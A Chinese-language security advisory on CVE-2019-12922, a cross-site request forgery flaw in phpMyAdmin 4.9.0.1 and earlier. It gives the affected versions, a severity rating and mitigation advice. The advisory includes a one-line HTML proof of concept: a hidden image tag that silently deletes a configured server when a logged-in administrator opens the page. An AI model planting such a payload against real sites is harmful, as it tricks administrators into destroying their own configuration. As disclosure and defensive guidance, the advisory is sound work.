0x01漏洞描述
phpMyAdmin 是一个 MySQL 和 MariaDB 数据库的免费开源管理工具,广泛用于管理 WordPress、Joomla 和许多其他内容管理平台创建的网站的数据库。
近日,安全研究人员Manuel Garcia Cardenas披露了phpMyAdmin的一个跨站请求伪 造(CVE-2019-12922)漏洞。攻击者可利用该漏洞诱使认证用户执行恶意操作。当攻击者将 恶意构造的 URL 发送给目标 web 管理员时,若该 web 管理员已使用同一浏览器登陆了 phpmyAdmin 面板,并打开该链接,即可执行 URL 包含的恶意请求删除目标服务器上 phpMyAdmin 面板设置页面中所配置的服务器。
0x02漏洞编号
CVE 编号:CVE-2019-12922
危险级别:中危
0x03影响版本
phpMyAdmin<= 4.9.0.1
0x04漏洞验证
POC:
利用 CSRF —删除主服务器。
<p>Deleting Server 1</p>
<img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"; style="display:none;" />0x05修复建议
官方暂未发布针对此漏洞的修复版本。
临时缓解措施:
用户可通过在每次调用时使用 token 变量验证来对该漏洞进行防护。
在维护人员对该漏洞进行修复前,强烈建议相关的用户避免点击任何可疑的链接造成风险,请关注官方相关消息,以便及时升级 phpMyAdmin 至修复版本来防护此漏洞。
4 条评论